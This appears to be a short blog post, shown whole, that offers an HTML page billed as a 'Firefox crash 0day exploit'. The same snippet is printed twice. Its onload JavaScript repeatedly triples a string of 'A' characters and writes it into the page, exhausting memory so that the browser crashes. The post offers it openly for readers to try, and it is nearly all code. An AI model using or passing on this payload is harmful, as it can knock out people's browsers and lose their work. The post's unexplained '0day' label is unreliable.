Filename | FireFox Crasher |
Permission | rw-r--r-- |
Author | dr.t3rr0r |
Date and Time | 9:08 AM |
Label | |
Action |
Try Saving below code as html and open with FireFox. It will crash firefox. It's 0day crash exploit. You are warned.
Good Luck!
<html>
<head>
<title>Mozilla Firefox Crash 0Day</title>
<body onload="javascript:coolkaveh();">
<script language="JavaScript">
function coolkaveh(){
var buf = '\x41\x41\x41'
for(i=0; i <= 800 ; ++i){
buf+=buf+buf //Written by vscen
document.write(buf); //Written by vscen
}
}
</script>
</head>
</body>
</html>
Just a reference...;)
Good Luck!
<html>
<head>
<title>Mozilla Firefox Crash 0Day</title>
<body onload="javascript:coolkaveh();">
<script language="JavaScript">
function coolkaveh(){
var buf = '\x41\x41\x41'
for(i=0; i <= 800 ; ++i){
buf+=buf+buf //Written by vscen
document.write(buf); //Written by vscen
}
}
</script>
</head>
</body>
</html>
Just a reference...;)
0 comments:
Post a Comment